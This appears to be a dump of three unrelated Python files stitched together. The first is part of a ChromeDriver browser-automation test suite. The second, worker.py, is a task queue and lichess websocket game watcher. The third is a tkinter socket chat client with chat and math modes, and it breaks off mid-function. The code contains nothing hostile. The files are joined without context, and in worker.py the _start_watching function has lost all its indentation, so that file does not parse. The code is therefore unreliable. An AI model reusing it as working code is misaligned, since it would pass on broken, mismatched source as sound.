  def testElementAPIClick(self):
    center_x, center_y = self._GetElementMiddle(self._divs[0])
    # Left click element.
    self._divs[0].click()
    events = self._driver.execute_script('return takeEvents()')
    self.assertEquals(3, len(events))
    self._CheckEvent(events[0], 'mousemove', 0, center_x, center_y)
    self._CheckEvent(events[1], 'mousedown', 0, center_x, center_y)
    self._CheckEvent(events[2], 'mouseup', 0, center_x, center_y)
class TypingTest(ChromeDriverTest):
  """Tests sending keys to various editable targets."""

  def setUp(self):
    super(TypingTest, self).setUp()
    self._driver = self.GetNewDriver()

  def testSendKeysToEditingHostDiv(self):
    self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
    div = self._driver.find_element_by_name('editable')
    # Break into two to ensure element doesn't lose focus.
    div.send_keys('hi')
    div.send_keys(' there')
    self.assertEquals('hi there', div.text)

  def testSendKeysToNonFocusableChildOfEditingHost(self):
    self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
    child = self._driver.find_element_by_name('editable_child')
    self.assertRaises(WebDriverException, child.send_keys, 'hi')

  def testSendKeysToFocusableChildOfEditingHost(self):
    self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
    child = self._driver.find_element_by_tag_name('input')
    child.send_keys('hi')
    child.send_keys(' there')
    self.assertEquals('hi there', child.get_attribute('value'))

  def testSendKeysToDesignModePage(self):
    self._driver.get(self.GetTestDataUrl() + '/design_mode_doc.html')
    body = self._driver.find_element_by_tag_name('body')
    body.send_keys('hi')
    body.send_keys(' there')
    self.assertEquals('hi there', body.text)

  def testSendKeysToDesignModeIframe(self):
    self._driver.get(self.GetTestDataUrl() + '/content_editable.html')
    self._driver.switch_to_frame(0)
    body = self._driver.find_element_by_tag_name('body')
    body.send_keys('hi')
    body.send_keys(' there')
    self.assertEquals('hi there', body.text)

  def testSendKeysToTransparentElement(self):
    self._driver.get(self.GetTestDataUrl() + '/transparent.html')
    text_box = self._driver.find_element_by_tag_name('input')
    text_box.send_keys('hi')
    self.assertEquals('hi', text_box.get_attribute('value'))

  def testSendKeysDesignModePageAfterNavigate(self):
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    self._driver.get(self.GetTestDataUrl() + '/design_mode_doc.html')
    body = self._driver.find_element_by_tag_name('body')
    body.send_keys('hi')
    body.send_keys(' there')
    self.assertEquals('hi there', body.text)

  def testAppendsToTextInput(self):
    # keyboard.html pre-fills both fields with 'more'; typing must append.
    self._driver.get(self.GetTestDataUrl() + '/keyboard.html')
    text_elem = self._driver.find_element_by_name('input')
    text_elem.send_keys(' text')
    self.assertEquals('more text', text_elem.get_attribute('value'))
    area_elem = self._driver.find_element_by_name('area')
    area_elem.send_keys(' text')
    self.assertEquals('more text', area_elem.get_attribute('value'))

  def testTextAreaKeepsCursorPosition(self):
    self._driver.get(self.GetTestDataUrl() + '/keyboard.html')
    area_elem = self._driver.find_element_by_name('area')
    area_elem.send_keys(' text')
    # Move the caret left past ' text' and 'more', then insert mid-string.
    area_elem.send_keys(Keys.LEFT * 9)
    area_elem.send_keys('much ')
    self.assertEquals('much more text', area_elem.get_attribute('value'))

  def testWithWebWidgets(self):
    """Exercises keyboard interaction with checkbox/radio/select/button."""
    def SetHTML(html):
      """Sets the page HTML.

      The given HTML should not contain single quotes.
      """
      assert '\'' not in html
      self._driver.execute_script('document.body.innerHTML = \'%s\'' % html)
    SetHTML('<input type="checkbox">check</input>')
    elem = self._driver.find_element_by_tag_name('input')
    elem.send_keys(' ')
    self.assertTrue(elem.is_selected())
    elem.send_keys(' ')
    self.assertFalse(elem.is_selected())
    SetHTML('<input type="radio" name="g" checked>1</input>' +
            '<input type="radio" name="g">2</input>')
    elem1, elem2 = self._driver.find_elements_by_tag_name('input')
    elem1.send_keys(Keys.RIGHT)
    self.assertTrue(elem2.is_selected())
    elem2.send_keys(Keys.LEFT)
    self.assertFalse(elem2.is_selected())
    SetHTML('<select><option>a</option><option>b</option></select>')
    elem = self._driver.find_element_by_tag_name('select')
    elem.send_keys('b')
    self.assertEquals('b', elem.get_attribute('value'))
    handler = 'javascript:document.title=\\x27success\\x27'
    SetHTML('<input type="button" onclick="%s"></input>' % handler)
    elem = self._driver.find_element_by_tag_name('input')
    elem.send_keys(' ')
    self.assertEquals('success', self._driver.title)
class UrlBaseTest(ChromeDriverTest):
  """Tests that the server can be configured for a different URL base."""

  # NOTE(review): setUp/tearDown do not call super(); presumably intentional
  # since this test only talks to its own private server -- confirm.
  def setUp(self):
    self._server2 = ChromeDriverLauncher(self.GetDriverPath(),
                                         url_base='/wd/hub').Launch()

  def tearDown(self):
    self._server2.Kill()

  def testCreatingSessionShouldRedirectToCorrectURL(self):
    """POSTs /session and checks the redirect URL honors the /wd/hub base."""
    request_url = self._server2.GetUrl() + '/session'
    response = SendRequest(request_url, method='POST',
                           data='{"desiredCapabilities":{}}')
    self.assertEquals(200, response.code)
    self.session_url = response.geturl()  # TODO(jleyba): verify this URL?
    data = json.loads(response.read())
    self.assertTrue(isinstance(data, dict))
    self.assertEquals(0, data['status'])
    # Expect path components: '', 'wd', 'hub', 'session', <session id>.
    url_parts = urlparse.urlparse(self.session_url)[2].split('/')
    self.assertEquals(5, len(url_parts))
    self.assertEquals('', url_parts[0])
    self.assertEquals('wd', url_parts[1])
    self.assertEquals('hub', url_parts[2])
    self.assertEquals('session', url_parts[3])
    self.assertEquals(data['sessionId'], url_parts[4])
# TODO(jleyba): Port this to WebDriver's own python test suite.
class ElementEqualityTest(ChromeDriverTest):
  """Tests that the server properly checks element equality."""

  def setUp(self):
    super(ElementEqualityTest, self).setUp()
    self._driver = self.GetNewDriver()

  def tearDown(self):
    self._driver.quit()

  def testElementEquality(self):
    """The same DOM node found two different ways must compare equal."""
    self._driver.get(self.GetTestDataUrl() + '/test_page.html')
    body1 = self._driver.find_element_by_tag_name('body')
    body2 = self._driver.execute_script('return document.body')
    # TODO(jleyba): WebDriver's python bindings should expose a proper API
    # for this.
    result = body1._execute(Command.ELEMENT_EQUALS, {
      'other': body2.id
    })
    self.assertTrue(result['value'])
class LoggingTest(ChromeDriverTest):
  """Checks that the server exposes its log over HTTP."""

  def testLogging(self):
    url = self.GetServer().GetUrl()
    req = SendRequest(url + '/log', method='GET')
    log = req.read()
    # Any server activity should have produced at least one INFO entry.
    self.assertTrue('INFO' in log, msg='INFO not in log: ' + log)
class FileUploadControlTest(ChromeDriverTest):
  """Tests dealing with file upload control."""

  def setUp(self):
    super(FileUploadControlTest, self).setUp()
    self._driver = self.GetNewDriver()

  # Fails on win - crbug.com/131782
  def DISABLED_testSetFilePathToFileUploadControl(self):
    """Verify a file path is set to the file upload control."""
    self._driver.get(self.GetTestDataUrl() + '/upload.html')
    tmp_file = tempfile.NamedTemporaryFile()
    fileupload_single = self._driver.find_element_by_name('fileupload_single')
    multiple = fileupload_single.get_attribute('multiple')
    self.assertEqual('false', multiple)
    fileupload_single.send_keys(tmp_file.name)
    path = fileupload_single.get_attribute('value')
    self.assertTrue(path.endswith(os.path.basename(tmp_file.name)))

  def testSetMultipleFilePathsToFileuploadControlWithoutMultipleWillFail(self):
    """Verify setting file paths to the file upload control without 'multiple'
    attribute will fail."""
    self._driver.get(self.GetTestDataUrl() + '/upload.html')
    files = []
    filepaths = []
    for index in xrange(4):
      tmp_file = tempfile.NamedTemporaryFile()
      # We need to hold the file objects because the files will be deleted on
      # GC.
      files.append(tmp_file)
      filepath = tmp_file.name
      filepaths.append(filepath)
    fileupload_single = self._driver.find_element_by_name('fileupload_single')
    self.assertFalse(fileupload_single.get_attribute('multiple'))
    # Multiple paths are sent as one newline-separated string.
    self.assertRaises(WebDriverException, fileupload_single.send_keys,
                      '\n'.join(filepaths))

  def testSetMultipleFilePathsToFileUploadControl(self):
    """Verify multiple file paths are set to the file upload control."""
    self._driver.get(self.GetTestDataUrl() + '/upload.html')
    files = []
    filepaths = []
    filenames = set()
    for index in xrange(4):
      tmp_file = tempfile.NamedTemporaryFile()
      # Hold the file objects; the files are deleted when they are GC'ed.
      files.append(tmp_file)
      filepath = tmp_file.name
      filepaths.append(filepath)
      filenames.add(os.path.basename(filepath))
    fileupload_multi = self._driver.find_element_by_name('fileupload_multi')
    multiple = fileupload_multi.get_attribute('multiple')
    self.assertEqual('true', multiple)
    fileupload_multi.send_keys('\n'.join(filepaths))
    files_on_element = self._driver.execute_script(
        'return document.getElementById("fileupload_multi").files;')
    self.assertTrue(files_on_element)
    self.assertEqual(4, len(files_on_element))
    for f in files_on_element:
      self.assertTrue(f['name'] in filenames)
class FrameSwitchingTest(ChromeDriverTest):
  """Tests for window handles and switching between windows/frames."""

  def testGetWindowHandles(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    driver.execute_script('window.popup = window.open("about:blank")')
    self.assertEquals(2, len(driver.window_handles))
    driver.execute_script('window.popup.close()')
    self.assertEquals(1, len(driver.window_handles))

  def testSwitchToSameWindow(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    driver.switch_to_window(driver.window_handles[0])
    self.assertEquals('test_page.html', driver.current_url.split('/')[-1])

  def testClosedWindowThrows(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    driver.execute_script('window.open("about:blank")')
    driver.close()
    # Second close targets an already-closed window.
    self.assertRaises(WebDriverException, driver.close)

  def testSwitchFromClosedWindow(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    driver.execute_script('window.open("about:blank")')
    old_window = driver.current_window_handle
    driver.close()
    driver.switch_to_window(driver.window_handles[0])
    self.assertEquals('about:blank', driver.current_url)

  def testSwitchToWindowWhileInSubframe(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/test_page.html')
    driver.execute_script('window.open("about:blank")')
    driver.switch_to_frame(0)
    driver.switch_to_window(driver.window_handles[1])
    self.assertEquals('about:blank', driver.current_url)

  # Tests that the indexing is absolute and not based on index of frame in its
  # parent element.
  # See crbug.com/88685.
  def testSwitchToFrameByIndex(self):
    driver = self.GetNewDriver({'chrome.switches': ['disable-popup-blocking']})
    driver.get(self.GetTestDataUrl() + '/switch_to_frame_by_index.html')
    for i in range(3):
      driver.switch_to_frame(i)
      # Each frame's URL ends with '?<absolute index>'.
      self.assertEquals(str(i), driver.current_url.split('?')[-1])
      driver.switch_to_default_content()
class AlertTest(ChromeDriverTest):
  """Tests that JavaScript alerts are surfaced and must be handled."""

  def testAlertOnLoadDoesNotHang(self):
    driver = self.GetNewDriver()
    self.assertRaises(WebDriverException, driver.get,
                      self.GetTestDataUrl() + '/alert_on_load.html')
    driver.switch_to_alert().accept()

  def testAlertWhenTypingThrows(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/alerts.html')
    input_box = driver.find_element_by_name('onkeypress')
    # The keypress handler opens an alert mid-command.
    self.assertRaises(WebDriverException, input_box.send_keys, 'a')

  def testAlertJustAfterTypingDoesNotThrow(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/alerts.html')
    driver.find_element_by_name('onkeyup').send_keys('a')
    driver.switch_to_alert().accept()

  def testAlertOnScriptDoesNotHang(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/alerts.html')
    self.assertRaises(WebDriverException, driver.execute_script, 'alert("ok")')

  # See http://code.google.com/p/selenium/issues/detail?id=2671.
  def testCanPerformJSBasedActionsThatCauseAlertsAtTheEnd(self):
    driver = self.GetNewDriver()
    driver.execute_script(
        'var select = document.createElement("select");' +
        'select.innerHTML = "<option>1</option><option>2</option>";' +
        'select.addEventListener("change", function() { alert("hi"); });' +
        'document.body.appendChild(select);')
    # Shouldn't throw an exception, even though an alert appears mid-script.
    driver.find_elements_by_tag_name('option')[-1].click()

  def testMustHandleAlertFirst(self):
    """While an alert is open, every other command must fail."""
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/alerts.html')
    input_box = driver.find_element_by_name('normal')
    driver.execute_async_script('arguments[0](); window.alert("ok")')
    self.assertRaises(WebDriverException, driver.execute_script, 'a = 1')
    self.assertRaises(WebDriverException, input_box.send_keys, 'abc')
    self.assertRaises(WebDriverException, driver.get,
                      self.GetTestDataUrl() + '/test_page.html')
    self.assertRaises(WebDriverException, driver.refresh)
    self.assertRaises(WebDriverException, driver.back)
    self.assertRaises(WebDriverException, driver.forward)
    self.assertRaises(WebDriverException, driver.get_screenshot_as_base64)

  def testCanHandleAlertInSubframe(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/alerts.html')
    driver.switch_to_frame('subframe')
    driver.execute_async_script('arguments[0](); window.alert("ok")')
    driver.switch_to_alert().accept()
class WindowTest(ChromeDriverTest):
  """Tests for WebDriver window commands."""

  def setUp(self):
    super(WindowTest, self).setUp()
    self._driver = self.GetNewDriver()

  def testSize(self):
    size = self._driver.get_window_size()
    # Setting the current size must be a no-op.
    self._driver.set_window_size(size['width'], size['height'])
    self.assertEquals(size, self._driver.get_window_size())
    self._driver.set_window_size(800, 600)
    self.assertEquals(800, self._driver.get_window_size()['width'])
    self.assertEquals(600, self._driver.get_window_size()['height'])

  def testPosition(self):
    pos = self._driver.get_window_position()
    # Setting the current position must be a no-op.
    self._driver.set_window_position(pos['x'], pos['y'])
    self.assertEquals(pos, self._driver.get_window_position())
    self._driver.set_window_position(100, 200)
    self.assertEquals(100, self._driver.get_window_position()['x'])
    self.assertEquals(200, self._driver.get_window_position()['y'])

  # Systems without window manager (Xvfb, Xvnc) do not implement maximization.
  @SkipIf(util.IsLinux())
  def testMaximize(self):
    old_size = self._driver.get_window_size()
    self._driver.maximize_window()
    new_size = self._driver.get_window_size()
    self.assertTrue(old_size['width'] <= new_size['width'])
    self.assertTrue(old_size['height'] <= new_size['height'])

  def testWindowHandle(self):
    """Test specifying window handle."""
    self._driver.execute_script(
        'window.open("about:blank", "name", "height=200, width=200")')
    windows = self._driver.window_handles
    self.assertEquals(2, len(windows))
    self._driver.set_window_size(400, 300, windows[1])
    self.assertEquals(400, self._driver.get_window_size(windows[1])['width'])
    self.assertEquals(300, self._driver.get_window_size(windows[1])['height'])
    self.assertNotEquals(self._driver.get_window_size(windows[1]),
                         self._driver.get_window_size(windows[0]))

  def testInvalidWindowHandle(self):
    """Tests specifying invalid handle."""
    invalid_handle = 'f1-120'
    self.assertRaises(WebDriverException, self._driver.set_window_size,
                      400, 300, invalid_handle)
    self.assertRaises(NoSuchWindowException, self._driver.get_window_size,
                      invalid_handle)
    self.assertRaises(NoSuchWindowException, self._driver.set_window_position,
                      1, 1, invalid_handle)
    self.assertRaises(NoSuchWindowException, self._driver.get_window_position,
                      invalid_handle)
class GeolocationTest(ChromeDriverTest):
  """Tests for WebDriver geolocation commands."""

  def testGeolocation(self):
    """Tests the get and set geolocation commands."""
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/empty.html')
    # TODO(kkania): Update the python bindings and get rid of these.
    driver.command_executor._commands.update({
        'getLoc': ('GET', '/session/$sessionId/location'),
        'setLoc': ('POST', '/session/$sessionId/location')
    })
    def getLocation():
      return driver.execute('getLoc')['value']
    def setLocation(location):
      driver.execute('setLoc', {'location': location})
    expected_location = {'latitude': 50, 'longitude': 50, 'altitude': 300}
    setLocation(expected_location)
    location = getLocation()
    self.assertEquals(expected_location, location)
    # Also confirm the overridden location is visible to page JavaScript.
    driver.set_script_timeout(10)
    result = driver.execute_async_script("""
        var callback = arguments[0];
        window.navigator.geolocation.getCurrentPosition(
            function success(result) { callback(result.coords); },
            function fail(error) { callback(error.message); });""")
    self.assertEquals(expected_location['latitude'], result['latitude'])
    self.assertEquals(expected_location['longitude'], result['longitude'])
    self.assertEquals(expected_location['altitude'], result['altitude'])
class ExtensionTest(ChromeDriverTest):
  """Tests installing/uninstalling extensions and driving their views."""

  # Paths to the test extensions bundled with the test data.
  INFOBAR_BROWSER_ACTION_EXTENSION = test_paths.TEST_DATA_PATH + \
      '/infobar_browser_action_extension'
  PAGE_ACTION_EXTENSION = test_paths.TEST_DATA_PATH + \
      '/page_action_extension'
  APP_SHELL = test_paths.TEST_DATA_PATH + \
      '/app_shell_extension'

  def testExtensionInstallAndUninstall(self):
    driver = self.GetNewDriver()
    self.assertEquals(0, len(driver.get_installed_extensions()))
    ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
    extensions = driver.get_installed_extensions()
    self.assertEquals(1, len(extensions))
    self.assertEquals(ext.id, extensions[0].id)
    ext.uninstall()
    self.assertEquals(0, len(driver.get_installed_extensions()))

  def testExtensionInfo(self):
    driver = self.GetNewDriver()
    ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
    self.assertEquals('Page action extension', ext.get_name())
    self.assertEquals('1.0', ext.get_version())
    self.assertEquals(32, len(ext.id))
    self.assertTrue(ext.is_enabled())
    ext.set_enabled(True)
    ext.set_enabled(False)
    self.assertFalse(ext.is_enabled())
    ext.set_enabled(True)
    self.assertTrue(ext.is_enabled())

  def _testExtensionView(self, driver, view_handle, extension):
    """Tests that the given view supports basic WebDriver functionality."""
    driver.switch_to_window(view_handle)
    self.assertTrue(driver.execute_script('return true'))
    checkbox = driver.find_element_by_id('checkbox')
    checkbox.click()
    self.assertTrue(checkbox.is_selected())
    textfield = driver.find_element_by_id('textfield')
    textfield.send_keys('test')
    self.assertEquals('test', textfield.get_attribute('value'))
    self.assertEquals('test', driver.title)
    self.assertTrue(driver.current_url.endswith('view_checks.html'))
    self.assertTrue('Should be in page source' in driver.page_source)
    driver.close()
    def is_view_closed(driver):
      return len(filter(lambda view: view['handle'] == view_handle,
                        extension._get_views())) == 0
    WebDriverWait(driver, 10).until(is_view_closed)

  # Mac extension infobars are currently broken: crbug.com/107573.
  @SkipIf(util.IsMac())
  def testInfobarView(self):
    driver = self.GetNewDriver({'chrome.switches':
                                ['enable-experimental-extension-apis']})
    ext = driver.install_extension(self.INFOBAR_BROWSER_ACTION_EXTENSION)
    driver.switch_to_window(ext.get_bg_page_handle())
    driver.set_script_timeout(10)
    driver.execute_async_script('waitForInfobar(arguments[0])')
    self._testExtensionView(driver, ext.get_infobar_handles()[0], ext)

  def testBrowserActionPopupView(self):
    driver = self.GetNewDriver({'chrome.switches':
                                ['enable-experimental-extension-apis']})
    ext = driver.install_extension(self.INFOBAR_BROWSER_ACTION_EXTENSION)
    ext.click_browser_action()
    self._testExtensionView(driver, ext.get_popup_handle(), ext)

  def testPageActionPopupView(self):
    driver = self.GetNewDriver()
    ext = driver.install_extension(self.PAGE_ACTION_EXTENSION)
    def is_page_action_visible(driver):
      return ext.is_page_action_visible()
    WebDriverWait(driver, 10).until(is_page_action_visible)
    ext.click_page_action()
    self._testExtensionView(driver, ext.get_popup_handle(), ext)

  def testAppShellView(self):
    driver = self.GetNewDriver({'chrome.switches':
                                ['enable-experimental-extension-apis']})
    ext = driver.install_extension(self.APP_SHELL)
    # Navigates to the new tab page to launch the app.
    driver.get('chrome:newtab')
    app = driver.find_element_by_xpath("//div[@title='App Shell']")
    app.click()
    def is_app_window_launched(driver):
      return ext.get_app_shell_handle() is not None
    WebDriverWait(driver, 10).until(is_app_window_launched)
    self._testExtensionView(driver, ext.get_app_shell_handle(), ext)
class BadJSTest(ChromeDriverTest):
  """Tests that ensure sites with hacky JS don't break ChromeDriver."""

  def testFindElementDoesNotUseNativeFuncs(self):
    driver = self.GetNewDriver()
    # bad_native_funcs.html overrides/poisons native DOM functions.
    driver.get(self.GetTestDataUrl() + '/bad_native_funcs.html')
    # This will throw an exception if any native funcs are used.
    driver.find_element_by_tag_name('body').find_elements_by_tag_name('div')
class ContentSettingsTest(ChromeDriverTest):
  """Tests that various types of content are allowed by default."""

  def testPopups(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/empty.html')
    driver.execute_script('window.open("about:blank")')
    self.assertEquals(2, len(driver.window_handles))

  # Failing on win7: crbug.com/141231.
  @SkipIf(util.IsWin())
  def testPopupsCanBeResized(self):
    """Regression test for chromedriver issue 126."""
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/empty.html')
    driver.execute_script(
        'window.open("empty.html", "popup", "width=500,height=500")')
    driver.switch_to_window(driver.window_handles[1])
    size = driver.get_window_size()
    # Derive larger/smaller target sizes from the current size.
    bigger_size = dict(map(lambda x: (x, size[x] + 100), size))
    smaller_size = dict(map(lambda x: (x, size[x] - 100), size))
    driver.set_window_size(bigger_size['width'], bigger_size['height'])
    self.assertEquals(bigger_size, driver.get_window_size())
    driver.set_window_size(smaller_size['width'], smaller_size['height'])
    self.assertEquals(smaller_size, driver.get_window_size())

  def testGeolocation(self):
    driver = self.GetNewDriver()
    driver.get(self.GetTestDataUrl() + '/empty.html')
    driver.set_script_timeout(10)
    # Will timeout if infobar appears.
    driver.execute_async_script(
        'navigator.geolocation.getCurrentPosition(arguments[0], arguments[0]);')

  def testMediaStream(self):
    driver = self.GetNewDriver()
    # Allowing camera/mic access by default only works for https sites.
    driver.get(self.GetHttpsTestDataUrl() + '/empty.html')
    driver.set_script_timeout(10)
    # Will timeout if infobar appears.
    driver.execute_async_script(
        'navigator.webkitGetUserMedia({audio:true, video:true},' +
        ' arguments[0], arguments[0]);')
|
worker.py
|
import itertools
import json
import queue
import threading
import time
from datetime import timedelta

import websocket
from django.utils import timezone
def _run_worker():
    """Daemon loop: pop queued tasks and run them, highest priority first.

    Runs forever. A failing task is swallowed so it cannot kill the
    worker thread.
    """
    while True:
        _, _, fn, args = _work_queue.get()
        try:
            fn(*args)
        except Exception:
            # Deliberate best-effort; narrowed from a bare `except:` so
            # SystemExit/KeyboardInterrupt would still propagate.
            pass


# Queue entries are (-priority, seq, fn, args). `seq` breaks priority ties so
# the heap never falls through to comparing the `fn` callables -- which raises
# TypeError on Python 3 -- and makes equal-priority tasks run FIFO.
_work_queue = queue.PriorityQueue()
_seq_counter = itertools.count()

_worker_thread = threading.Thread(target=_run_worker)
_worker_thread.daemon = True  # don't block interpreter shutdown
_worker_thread.start()


def queue_work(priority, fn, *args):
    """Schedule fn(*args) on the worker thread; higher priority runs first."""
    _work_queue.put((-priority, next(_seq_counter), fn, args))
def _run_socket():
    """Daemon loop: keep a lichess websocket open and record 'fen' updates.

    Reconnects forever.  If the previous connection attempt started less
    than 10 seconds ago (i.e. the connection died quickly), sleeps with
    exponential backoff (2s doubling up to a 120s cap) before retrying.
    """
    global _websocket
    last_start = None
    fallback = 2
    while True:
        try:
            # last_start within the last 10s means the previous connection
            # failed almost immediately -> back off before reconnecting.
            if last_start is not None and last_start > timezone.now() - timedelta(seconds=10):
                time.sleep(fallback)
                fallback = fallback * 2
                if fallback > 120:
                    fallback = 120
            else:
                fallback = 2
            last_start = timezone.now()
            _websocket = websocket.create_connection('wss://socket.lichess.org/api/socket')
            # Re-subscribe every game we were watching before the reconnect.
            with _games_lock:
                for game_id in list(_games.keys()):
                    _start_watching(game_id)
            while True:
                msg = json.loads(_websocket.recv())
                if msg['t'] == 'fen':
                    with _games_lock:
                        game_id = msg['d']['id']
                        if game_id in _games:
                            # Keep only the latest raw 'fen' message per game.
                            _games[game_id] = msg
        except:
            # Any socket/JSON failure: loop around and reconnect.
            continue
def _start_watching(game_id):
try:
_websocket.send(json.dumps({'t': 'startWatching', 'd': game_id}))
except:
pass
# Active websocket connection (None until _run_socket first connects).
_websocket = None
# game_id -> latest 'fen' message, or None until the first update arrives.
_games = {}
# Guards _games against concurrent access by the socket and caller threads.
_games_lock = threading.Lock()
_socket_thread = threading.Thread(target=_run_socket)
_socket_thread.daemon = True
_socket_thread.start()
def watch_games(game_ids):
    """Sync the watch set to exactly `game_ids` and return their latest states.

    Games no longer requested are dropped; newly requested games get a
    subscription.  Returns the last 'fen' message per game (None if nothing
    has arrived yet), in the same order as `game_ids`.
    """
    with _games_lock:
        game_id_set = set(game_ids)
        for game_id in set(_games.keys()) - game_id_set:
            del _games[game_id]
        for game_id in game_id_set - set(_games.keys()):
            _games[game_id] = None
            _start_watching(game_id)
        # Snapshot the results while still holding the lock: the original
        # returned after releasing it, racing with the socket thread.
        return [_games[game_id] for game_id in game_ids]
def add_watch(game_id):
    """Start watching `game_id` unless it is already being watched."""
    with _games_lock:
        if game_id in _games:
            return
        _games[game_id] = None
        _start_watching(game_id)
|
client-copy2.py
|
# -*- coding: utf-8 -*-
import socket
from tkinter import *
import time
import threading
global sock,t, txtMsg,txtMsgList,addr,M,chat_client_list
def Clear_History():
    """Wipe the entire chat-history text widget."""
    txtMsgList.delete('0.0', END)
def sendMsg(sock):  # Send the composed message
    """Read the input box, send its contents, and close on the quit command."""
    text = txtMsg.get('0.0', END).strip() + "\n"
    txtMsg.delete('0.0', END)
    sock.send(text.encode('utf-8'))
    # "endchat" is the protocol-level leave command: also close the window.
    if text == "endchat\n":
        close()
def cancelMsg():  # Discard the message being composed
    """Clear the input box without sending.

    Bug fix: the start index was '' which is not a valid tkinter Text index
    (every other call in this file uses '0.0'), so the Cancel button raised
    a TclError instead of clearing the box.
    """
    txtMsg.delete('0.0', END)
def sendMsgEvent(event):  # Keyboard shortcut handler
    """Send the current message when the Return key is pressed."""
    if event.keysym == "Return":  # Enter sends the message
        sendMsg(sock)
def send_close():
    """Tell the server we are leaving, then close the window."""
    sock.send("endchat\n".encode('utf-8'))
    close()
def close():  # Known bug: closing directly does not notify the server first
    """Destroy the main Tk window."""
    t.destroy()  # tear down the GUI
def add_chat_client_info():
    """Rebuild the contact listbox from the current online-client list."""
    listLianxi.delete(0, END)
    for index, client in enumerate(chat_client_list):
        listLianxi.insert(END, f'Client{index}(ONLINE):')
        listLianxi.insert(END, str(client))
# <editor-fold desc="Tk GUI setup block">
t = Tk()  # create the main window
t.title('Chat聊天窗口')  # window title
t.resizable(0, 0)  # forbid resizing the window
###****** frame containers ******###
frmA1 = Frame(width=180, height=300)
frmB1 = Frame(width=350, height=300)
frmB2 = Frame(width=350, height=80)
frmB3 = Frame(width=350, height=25)
###****** widgets ******###
# 1. Text widgets: history display and message input
txtMsgList = Text(frmB1,width=45)
txtMsg = Text(frmB2,width=45);
txtMsg.bind("<KeyPress-Return>", sendMsgEvent)  # bind Enter as the send shortcut
btnSend = Button(frmB3, text='发送', width=8, command=lambda: sendMsg(sock))
btnCancel = Button(frmB3, text='取消', width=8, command=cancelMsg)
btnCance2 = Button(frmB3, text="关闭", width=8, command=send_close)
btnCance3 = Button(frmB3, text="清除记录", width=8, command=Clear_History)
scroLianxi = Scrollbar(frmA1, width=22)  # scrollbar for the member list
listLianxi = Listbox(frmA1, width=24, height=20,
                     yscrollcommand=scroLianxi.set)  # connect listbox to vertical scrollbar
scroLianxi.config(command=listLianxi.yview)  # scrolling the bar scrolls the listbox
###****** window layout ******###
frmA1.grid(row=0, column=0)
frmB1.grid(row=0, column=1)
frmB2.grid(row=2, column=1)
frmB3.grid(row=3, column=1)
###****** window layout ******###
frmA1.grid_propagate(0)
frmB1.grid_propagate(0)
frmB2.grid_propagate(0)
frmB3.grid_propagate(0)
###****** widget layout ******###
btnSend.grid(row=0, column=0)
btnCancel.grid(row=0, column=1)
btnCance2.grid(row=0, column=2)
btnCance3.grid(row=0, column=3)
txtMsgList.grid()
txtMsg.grid()
scroLianxi.grid(row=0, column=1, ipady=120)
listLianxi.grid(row=0, column=0)
# </editor-fold>
def autorobot(sock):
    """Echo-chat mode: forward user input to the server and print the reply.

    Typing "end" leaves the mode.
    """
    # Receive and show the mode instructions.
    illustrate = sock.recv(1024)
    print(illustrate.decode('utf-8'))
    while True:
        m = input('cloemt:')
        sock.send(m.encode('utf-8'))
        if m == "end":
            print('**结束autorobot模式**')
            break
        else:
            r = sock.recv(1024)
            r = r.decode('utf-8')
            print('server:', r)
def math(sock):
    """Math mode: drive the server's calculator sub-protocol.

    Commands: 'a'/'b' answer a single prompted value, 'c' computes a
    trapezoid area from three prompts, 'd' a parallelogram area from two,
    'end' leaves the mode; anything else just echoes the server's reply.
    """
    # Receive and show the mode instructions.
    illustrate = sock.recv(1024)
    print(illustrate.decode('utf-8'))
    while True:
        m = input('cloemt:')
        sock.send(m.encode('utf-8'))
        if m == "end":
            print('**结束math数学模式**')
            break
        elif m == "math":
            r = sock.recv(1024)
            r = r.decode('utf-8')
            print('server:', r)
        elif m == "a":
            # Receive the problem prompt.
            ill = sock.recv(1024)
            print(ill.decode('utf-8'))
            # ******** single prompted value
            m = input('cloemt:')
            m = m.encode('utf-8')
            sock.send(m)
            # ********
            result = sock.recv(1024).decode('utf-8')
            print("返回结果:", result)
        elif m == "b":
            # Receive the problem prompt.
            ill = sock.recv(1024)
            print(ill.decode('utf-8'))
            # ******** single prompted value
            m = input('cloemt:')
            m = m.encode('utf-8')
            sock.send(m)
            # ********
            result = sock.recv(1024).decode('utf-8')
            print("返回结果:", result)
        elif m == "c":
            # Receive the problem prompt.
            ill = sock.recv(1024)
            print(ill.decode('utf-8'))
            # ******** three prompted values for the trapezoid
            r1 = sock.recv(1024).decode('utf-8')
            m = input(r1)
            sock.send(m.encode('utf-8'))
            r2 = sock.recv(1024).decode('utf-8')
            m = input(r2)
            sock.send(m.encode('utf-8'))
            r3 = sock.recv(1024).decode('utf-8')
            m = input(r3)
            sock.send(m.encode('utf-8'))
            # ********
            result = sock.recv(1024).decode('utf-8')
            print("梯形面积:", result)
        elif m == "d":
            # Receive the problem prompt.
            ill = sock.recv(1024)
            print(ill.decode('utf-8'))
            # ******** two prompted values for the parallelogram
            r1 = sock.recv(1024).decode('utf-8')
            m = input(r1)
